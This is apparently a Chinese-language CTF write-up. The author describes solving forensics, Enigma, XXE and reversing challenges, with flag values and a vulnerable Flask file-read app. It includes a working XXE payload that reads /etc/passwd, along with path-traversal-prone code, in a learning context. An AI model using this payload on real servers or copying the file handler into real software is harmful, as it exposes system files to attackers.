因为只会web,其他方向都没碰过,所以只出了4道
做出来的:
ezEvtx
找到一个被移动的文件,疑似被入侵
提交flag{confidential.docx}成功解出
flag{confidential.docx}
Flowzip
过滤器搜索flag找到flag
flag{c6db63e6-6459-4e75-bb37-3aec5d2b947b}
Enigma
将加密后的密文丢进cyberchef,选择Enigma,解出明文
flag{HELLOCTFERTHISISAMESSAGEFORYOU}
星际XML解析器
<?xml version="1.0"?>
<!DOCTYPE message [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<message>
<user>&xxe;</user>
</message>xxe语句测试,成功访问到根目录下的flag文件
flag{232d46ad-bc55-4484-a134-45c8f54b2622}
没做出来的:
密室黑客逃脱:
快进到得到源码
import os
from flask import Flask, request, render_template
from config import *
# author: gamelab
app = Flask(__name__)
# 模拟敏感信息
sensitive_info = SENSITIVE_INFO
# 加密密钥
encryption_key = ENCRYPTION_KEY
def simple_encrypt(text, key):
encrypted = bytearray()
for i in range(len(text)):
char = text[i]
key_char = key[i % len(key)]
encrypted.append(ord(char) + ord(key_char))
return encrypted.hex()
encrypted_sensitive_info = simple_encrypt(sensitive_info, encryption_key)
# 模拟日志文件内容
log_content = f"用户访问了 /secret 页面,可能试图获取 {encrypted_sensitive_info}"
# 模拟隐藏文件内容
hidden_file_content = f"解密密钥: {encryption_key}"
# 指定安全的文件根目录
SAFE_ROOT_DIR = os.path.abspath('/app')
with open(os.path.join(SAFE_ROOT_DIR, 'hidden.txt'), 'w') as f:
f.write(hidden_file_content)
@app.route('/')
def index():
return render_template('index.html')
@app.route('/logs')
def logs():
return render_template('logs.html', log_content=log_content)
@app.route('/secret')
def secret():
return render_template('secret.html')
@app.route('/file')
def file():
file_name = request.args.get('name')
if not file_name:
return render_template('no_file_name.html')
full_path = os.path.abspath(os.path.join(SAFE_ROOT_DIR, file_name))
if not full_path.startswith(SAFE_ROOT_DIR) or 'config' in full_path:
return render_template('no_premission.html')
try:
with open(full_path, 'r') as f:
content = f.read()
return render_template('file_content.html', content=content)
except FileNotFoundError:
return render_template('file_not_found.html')
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0')获得密钥和密文后就可以编写解密程序了
def simple_decrypt(encrypted_hex, key):
encrypted_bytes = bytearray.fromhex(encrypted_hex)
decrypted = bytearray()
for i in range(len(encrypted_bytes)):
encrypted_char = encrypted_bytes[i]
key_char = key[i % len(key)]
decrypted.append(encrypted_char - ord(key_char))
return decrypted.decode('utf-8')
print(simple_decrypt("d9d1c4d9e0abc2a497df9a9a6c5fa4c9c9a592a8c39ccba6709b6b98a0c7c6d89cd994a39aae6f6f68af", "secret_key8672"))
# flag{7c92fbd5-1df3-4d1f-8e4f-bcf7e5855791}解密程序不会写偷了一个,这个没得说,没有AI,我又没学过密码,确实不太会解密
ShadowPhases
现在复盘看,当时没看这道题真牛魔可惜,50分送到嘴边了都没要QaQ
下载下来exe文件检查没有壳直接丢进IDA
int __fastcall main(int argc, const char **argv, const char **envp)
{
char Str1[128]; // [rsp+30h] [rbp-50h] BYREF
char Str2[128]; // [rsp+B0h] [rbp+30h] BYREF
void *v6; // [rsp+130h] [rbp+B0h]
void *v7; // [rsp+138h] [rbp+B8h]
void *v8; // [rsp+140h] [rbp+C0h]
void *v9; // [rsp+150h] [rbp+D0h]
void *v10; // [rsp+158h] [rbp+D8h]
void *v11; // [rsp+160h] [rbp+E0h]
char v12[13]; // [rsp+16Eh] [rbp+EEh] BYREF
char v13[15]; // [rsp+17Bh] [rbp+FBh] BYREF
char Src[5]; // [rsp+18Ah] [rbp+10Ah] BYREF
char v15[9]; // [rsp+18Fh] [rbp+10Fh] BYREF
void *v16; // [rsp+198h] [rbp+118h]
void *v17; // [rsp+1A0h] [rbp+120h]
void *Block; // [rsp+1A8h] [rbp+128h]
char v19[6]; // [rsp+1B2h] [rbp+132h] BYREF
size_t v20; // [rsp+1B8h] [rbp+138h]
size_t v21; // [rsp+1C0h] [rbp+140h]
size_t Size; // [rsp+1C8h] [rbp+148h]
sub_401B10(argc, argv, envp);
Src[0] = 0;
Src[1] = 5;
Src[2] = -125;
Src[3] = 0x80;
Src[4] = -114;
strcpy(v15, "+");
v15[2] = -125;
v15[3] = 47;
v15[4] = -86;
v15[5] = 43;
v15[6] = -127;
v15[7] = -88;
v15[8] = -91;
Size = 14i64;
v13[0] = 19;
v13[1] = 57;
v13[2] = -66;
v13[3] = -66;
v13[4] = -76;
v13[5] = 56;
v13[6] = -72;
v13[7] = -70;
v13[8] = -69;
v13[9] = -76;
v13[10] = 62;
v13[11] = -112;
v13[12] = 58;
v13[13] = -70;
v13[14] = -76;
v21 = 15i64;
v12[0] = -117;
v12[1] = -119;
v12[2] = 34;
v12[3] = -120;
v12[4] = -117;
v12[5] = 32;
v12[6] = 9;
v12[7] = 34;
v12[8] = -120;
v12[9] = 8;
v12[10] = -115;
v12[11] = -120;
v12[12] = -81;
v20 = 13i64;
v19[5] = -103;
v19[4] = -35;
v19[3] = -1;
qmemcpy(v19, "\"Df", 3);
Block = malloc(0xFui64);
v17 = malloc(v21 + 1);
v16 = malloc(v20 + 1);
if ( !Block || !v17 || !v16 )
{
puts(Buffer);
exit(1);
}
memcpy(Block, Src, Size);
memcpy(v17, v13, v21);
memcpy(v16, v12, v20);
sub_4015B6(Block, Size, (unsigned __int8)v19[2]);
sub_4015B6(v17, v21, (unsigned __int8)v19[1]);
sub_4015B6(v16, v20, (unsigned __int8)v19[0]);
*((_BYTE *)Block + Size) = 0;
*((_BYTE *)v17 + v21) = 0;
*((_BYTE *)v16 + v20) = 0;
v9 = v17;
v10 = v16;
v11 = Block;
v6 = Block;
v7 = v17;
v8 = v16;
sub_401550(Str2, 128i64, "%s%s%s", (const char *)Block, (const char *)v17, (const char *)v16);
printf("请输入 flag: ");
scanf("%127s", Str1);
if ( !strcmp(Str1, Str2) )
puts(asc_40502A);
else
puts(asc_405031);
free(Block);
free(v17);
free(v16);
return 0;
}伪C长这样,简单看一下,猜测在if ( !strcmp(Str1, Str2) )这里有flag值,在这里加断点进行动态调试
最后在栈的这里找到flag(虽然不知道为什么我看他们的是和在一行的,我的是分开的,但是只要拿到flag就好)
BashBreaker
这个题抽象的没边,不看了
RuneBreach
沟槽的pwn,不看了
crawler
两解题,当然不是我能做的
Jdbc_once
零解,可能出题方不出一个零解题出题方心里不得劲
剩下两道密码也是看都看不懂喵,但是easy_AES后面又被py烂了,咸鱼又发力了,给我的排名最后半小时挤下去150(不嘻嘻)